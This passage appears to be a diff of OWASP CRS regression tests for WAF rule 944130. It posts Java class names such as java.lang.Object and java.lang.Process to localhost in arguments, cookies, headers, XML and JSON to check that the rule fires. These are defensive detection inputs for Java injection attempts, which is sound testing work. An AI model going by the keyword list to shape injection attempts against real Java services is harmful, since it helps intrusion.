log_contains: "id \"944130\"" - - test_title: 944130-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 285 desc: "Content-Type application/json arg value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Integer\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log: + expect_ids: [944130] + - test_id: 286 desc: "Content-Type application/json arg name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Integer\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 287 desc: "Argument test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 288 desc: "Argument name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log: + expect_ids: [944130] + - test_id: 289 desc: "Cookie test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 290 desc: "Cookie name 
includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Number=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 291 desc: "Request header test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 292 desc: "XML attribute value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 293 desc: "XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 294 desc: "Nested XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 295 desc: "Content-Type text/plain includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: 
+ Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 296 desc: "Content-Type application/json arg value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Number\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log: + expect_ids: [944130] + - test_id: 297 desc: "Content-Type application/json arg name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"java.lang.Number\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 298 desc: "Argument test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 299 desc: "Argument name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log: + expect_ids: [944130] + - test_id: 300 desc: "Cookie test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 301 desc: "Cookie name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Object=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 302 desc: "Request header test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"test=value" + output: + log: + expect_ids: [944130] + - test_id: 303 desc: "XML attribute value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 304 desc: "XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" 
+ uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 305 desc: "Nested XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 306 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 307 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Object\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log: + expect_ids: [944130] + - test_id: 308 desc: "Content-Type application/json arg name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Object\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 309 desc: "Argument test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 310 desc: "Argument name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process=test" - output: - log_contains: "id \"944130\"" - - 
test_title: 944130-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log: + expect_ids: [944130] + - test_id: 311 desc: "Cookie test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 312 desc: "Cookie name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
